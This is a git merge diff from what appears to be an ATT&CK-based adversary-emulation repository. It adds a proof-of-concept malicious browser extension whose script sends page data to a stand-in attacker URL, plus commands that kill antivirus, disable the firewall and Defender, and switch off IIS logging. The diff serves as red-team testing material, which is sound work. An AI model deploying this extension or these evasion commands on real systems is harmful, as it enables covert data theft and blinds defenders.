Merge branch 'master' into master
commit
fb99ca3f6f
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -0,0 +1,37 @@
|
|||
function exfil(str) {
|
||||
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
|
||||
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
|
||||
// and probably a thousand other methods. But this one is easy.
|
||||
var buffer = new TextEncoder("utf-8").encode(str);
|
||||
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
|
||||
}
|
||||
|
||||
function callUrl(buffer) {
|
||||
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
|
||||
// except it's example.com so w/e
|
||||
var digest = hex(buffer);
|
||||
var url = "https://example.com/" + digest;
|
||||
console.log("Exfiltrating data to " + url)
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
xmlHttp.open( "GET", url, true);
|
||||
xmlHttp.send( null);
|
||||
return digest;
|
||||
}
|
||||
|
||||
function hex(buffer) {
|
||||
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
|
||||
var hexCodes = [];
|
||||
var view = new DataView(buffer);
|
||||
for (var i = 0; i < view.byteLength; i += 4) {
|
||||
var value = view.getUint32(i)
|
||||
var stringValue = value.toString(16)
|
||||
var padding = '00000000'
|
||||
var paddedValue = (padding + stringValue).slice(-padding.length)
|
||||
hexCodes.push(paddedValue);
|
||||
}
|
||||
var athing = hexCodes.join("");
|
||||
return hexCodes.join("");
|
||||
}
|
||||
|
||||
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
|
||||
var digest = exfil(document.title);
|
|
@ -0,0 +1,16 @@
|
|||
{
|
||||
"name": "Minimum Viable Malicious Extension",
|
||||
"description": "Base Level Extension",
|
||||
"version": "1.0",
|
||||
"manifest_version": 2,
|
||||
"content_scripts": [
|
||||
{
|
||||
"matches": [
|
||||
"<all_urls>"
|
||||
],
|
||||
"js": [
|
||||
"inline.js"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -4,14 +4,14 @@
|
|||
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||
| [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
|
||||
| Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
|
||||
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
|
||||
| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||
| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||
| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
|
||||
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
|
||||
| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication |
|
||||
| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
|
||||
| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||
| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
|
||||
| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||
| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||
| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels |
|
||||
| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels |
|
||||
| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication |
|
||||
| | | Masquerading | | | | | | | Multilayer Encryption |
|
||||
| | | Redundant Access | | | | | | | Remote File Copy |
|
||||
| | | Scripting | | | | | | | Standard Application Layer Protocol |
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -0,0 +1,37 @@
|
|||
function exfil(str) {
|
||||
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
|
||||
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
|
||||
// and probably a thousand other methods. But this one is easy.
|
||||
var buffer = new TextEncoder("utf-8").encode(str);
|
||||
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
|
||||
}
|
||||
|
||||
function callUrl(buffer) {
|
||||
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
|
||||
// except it's example.com so w/e
|
||||
var digest = hex(buffer);
|
||||
var url = "https://example.com/" + digest;
|
||||
console.log("Exfiltrating data to " + url)
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
xmlHttp.open( "GET", url, true);
|
||||
xmlHttp.send( null);
|
||||
return digest;
|
||||
}
|
||||
|
||||
function hex(buffer) {
|
||||
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
|
||||
var hexCodes = [];
|
||||
var view = new DataView(buffer);
|
||||
for (var i = 0; i < view.byteLength; i += 4) {
|
||||
var value = view.getUint32(i)
|
||||
var stringValue = value.toString(16)
|
||||
var padding = '00000000'
|
||||
var paddedValue = (padding + stringValue).slice(-padding.length)
|
||||
hexCodes.push(paddedValue);
|
||||
}
|
||||
var athing = hexCodes.join("");
|
||||
return hexCodes.join("");
|
||||
}
|
||||
|
||||
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
|
||||
var digest = exfil(document.title);
|
|
@ -0,0 +1,16 @@
|
|||
{
|
||||
"name": "Minimum Viable Malicious Extension",
|
||||
"description": "Base Level Extension",
|
||||
"version": "1.0",
|
||||
"manifest_version": 2,
|
||||
"content_scripts": [
|
||||
{
|
||||
"matches": [
|
||||
"<all_urls>"
|
||||
],
|
||||
"js": [
|
||||
"inline.js"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -3,7 +3,7 @@
|
|||
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|
||||
|------------------------------|-------------------------------|---------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||
| [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
|
||||
| Browser Extensions | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||
| [Browser Extensions](Persistence/Browser_Extensions.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
|
||||
| [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Browser Extensions | Data Encrypted | Connection Proxy |
|
||||
| Dylib Hijacking | Plist Modification | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Exploitation of Vulnerability | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Logon Scripts](Persistence/Logon_Scripts.md) | Launchctl | Clipboard Data | Data Transfer Size Limits | [Custom Command and Control Protocol](Command_and_Control/Custom_Command_and_Control_Protocol.md) |
|
||||
| Hidden Files and Directories | Process Injection | Exploitation of Vulnerability | Input Capture | [Network Share Discovery](Discovery/Network_Share_Discovery.md) | Remote File Copy | Local Job Scheduling | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -0,0 +1,28 @@
|
|||
# Disabling Security Tools
|
||||
|
||||
MITRE ATT&CK Technique: [T1089](https://attack.mitre.org/wiki/Technique/T1089)
|
||||
|
||||
## Terminate Anti-Virus Processes
|
||||
`Taskkill /F /IM avprocess.exe`
|
||||
|
||||
## Disable Firewall
|
||||
`netsh firewall set opmode disable`
|
||||
|
||||
## Stop Windows Security Center
|
||||
`net stop wscsvc`
|
||||
|
||||
## Stop Windows Defender
|
||||
|
||||
### Windows 7/8
|
||||
`net stop windefend`
|
||||
|
||||
### Windows 10
|
||||
`PS > Set-MpPreference -DisableRealtimeMonitoring $true`
|
||||
|
||||
## Disable Default Web Site Logging IIS 7
|
||||
|
||||
### Disable Default Web Site Logging IIS 7
|
||||
`%windir%\system32\inetsrv\appcmd.exe set config "Default Web Site" -section:system.webServer/httpLogging /dontLog:"True" /commit:apphost`
|
||||
|
||||
### Restart Default Web Site IIS 7
|
||||
`%windir%\system32\inetsrv\appcmd.exe stop site /site.name:"Default Web Site" && %windir%\system32\inetsrv\appcmd.exe start site /site.name:"Default Web Site"`
|
|
@ -0,0 +1,37 @@
|
|||
function exfil(str) {
|
||||
// take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
|
||||
// other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
|
||||
// and probably a thousand other methods. But this one is easy.
|
||||
var buffer = new TextEncoder("utf-8").encode(str);
|
||||
return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
|
||||
}
|
||||
|
||||
function callUrl(buffer) {
|
||||
// this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
|
||||
// except it's example.com so w/e
|
||||
var digest = hex(buffer);
|
||||
var url = "https://example.com/" + digest;
|
||||
console.log("Exfiltrating data to " + url)
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
xmlHttp.open( "GET", url, true);
|
||||
xmlHttp.send( null);
|
||||
return digest;
|
||||
}
|
||||
|
||||
function hex(buffer) {
|
||||
// nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
|
||||
var hexCodes = [];
|
||||
var view = new DataView(buffer);
|
||||
for (var i = 0; i < view.byteLength; i += 4) {
|
||||
var value = view.getUint32(i)
|
||||
var stringValue = value.toString(16)
|
||||
var padding = '00000000'
|
||||
var paddedValue = (padding + stringValue).slice(-padding.length)
|
||||
hexCodes.push(paddedValue);
|
||||
}
|
||||
var athing = hexCodes.join("");
|
||||
return hexCodes.join("");
|
||||
}
|
||||
|
||||
// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
|
||||
var digest = exfil(document.title);
|
|
@ -0,0 +1,16 @@
|
|||
{
|
||||
"name": "Minimum Viable Malicious Extension",
|
||||
"description": "Base Level Extension",
|
||||
"version": "1.0",
|
||||
"manifest_version": 2,
|
||||
"content_scripts": [
|
||||
{
|
||||
"matches": [
|
||||
"<all_urls>"
|
||||
],
|
||||
"js": [
|
||||
"inline.js"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
## Browser Extensions
|
||||
|
||||
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
|
||||
|
||||
|
||||
### Chrome (Developer Mode)
|
||||
|
||||
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
|
||||
|
||||
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
|
||||
|
||||
Then click 'Select'
|
||||
|
||||
### Chrome (Chrome Web Store)
|
||||
|
||||
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
|
||||
|
||||
### Firefox
|
||||
|
||||
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
|
||||
|
||||
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
|
||||
|
||||
Then click 'Open'
|
|
@ -4,14 +4,14 @@
|
|||
|-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
|
||||
| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port |
|
||||
| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
|
||||
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy |
|
||||
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
|
||||
| [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol |
|
||||
| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
|
||||
| Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
|
||||
| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||
| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
|
||||
| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting |
|
||||
| Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels |
|
||||
| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |
|
||||
| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |
|
||||
| [Create Account](Credential_Access/Create_Account.md) | Hooking | Exploitation of Vulnerability | Password Filter DLL | [Security Software Discovery](Discovery/Security_Software_Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Man in the Browser | | Multi-hop Proxy |
|
||||
| DLL Search Order Hijacking | Image File Execution Options Injection | Extra Window Memory Injection | Private Keys | [System Information Discovery](Discovery/System_Information_Discovery.md) | Taint Shared Content | [Rundll32](Execution/rundll32.md) | Screen Capture | | Multiband Communication |
|
||||
| External Remote Services | [New Service](Persistence/New_Service.md) | [File Deletion](Defense_Evasion/File_Deletion.md) | Replication Through Removable Media | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | Third-party Software | Scheduled Task | Video Capture | | Multilayer Encryption |
|
||||
|
|
Loading…
Reference in New Issue